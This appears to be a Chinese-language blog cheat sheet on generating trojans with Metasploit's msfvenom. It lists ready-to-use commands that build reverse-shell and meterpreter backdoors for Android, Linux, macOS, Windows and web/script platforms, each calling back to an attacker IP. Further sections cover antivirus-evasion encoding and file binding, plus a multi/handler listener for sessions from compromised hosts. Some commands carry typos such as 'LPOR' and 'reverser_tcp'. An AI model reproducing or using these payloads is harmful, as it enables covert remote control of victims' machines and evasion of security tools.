利用msf框架生成常见的木马

常用木马

安卓app
msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPOR=8888 -o test.apk
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPOR=8888 -f elf>shell.elf
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=ip LPOR=8888 -f macho>shell.macho
PHP:
msfvenom -p php/meterpreter/reverse_tcp LHOST=ip LPOR=8888 -o xx.php
exe:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.27 lport=8888 -f exe -o test.exe

常用参数:

–p (- -payload-options):添加载荷payload。载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT,就可以生成对应语言,对应平台的后门了!!!
–l:查看所有payload encoder nops。
–f :输出文件格式。
–e:编码免杀。
–a:选择架构平台 x86 | x64 | x86_64
–o:文件输出
–s:生成payload的最大长度,就是文件大小。
–b:避免使用的字符 。
–i:编码次数。
–c:添加自己的shellcode
–x | -k:捆绑

编码免杀设置例如:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.27 lport=8888 -i 3 -e x86/shikata_ga_nai -f exe -o test.exe #编码3次(请注意多次编码之后是否可用

生成木马案例

安卓app:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.27 LPORT=8888 -o ~/Desktop/test2.apk

Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.27 LPORT=8888 -f elf > shell.elf

Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.27 LPORT=8888 -f macho > shell.macho

PHP:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.27 LPORT=8888 -f raw -o test.php

ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.27 LPORT=8888 -f asp > shell.asp

ASPX:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.27 LPORT=8888 -f aspx > shell.aspx

JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.27 LPORT=8888 -f raw > shell.jsp

Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.27 LPORT=8888 -f raw > shell.sh

Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.27 LPORT=8888 -f raw > shell.pl

Python
msfvenom -p python/meterpreter/reverser_tcp LHOST=192.168.1.27 LPORT=8888 -f raw > shell.py

监听代码示例:

msf > use exploit/multi/handler #使用exploit/multi/handler 监听从肉鸡发来的数据
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp #设置payload,不同的木马设置不同的payload(在什么目录下生成的木马就设置什么目录下的payload
msf exploit(handler) > set lhost 192.168.10.15 #我们的主机ip
msf exploit(handler) > set lport 4444 #我们的主机端口
msf exploit(handler) > exploit

你可能感兴趣的:(#,工具的基本使用)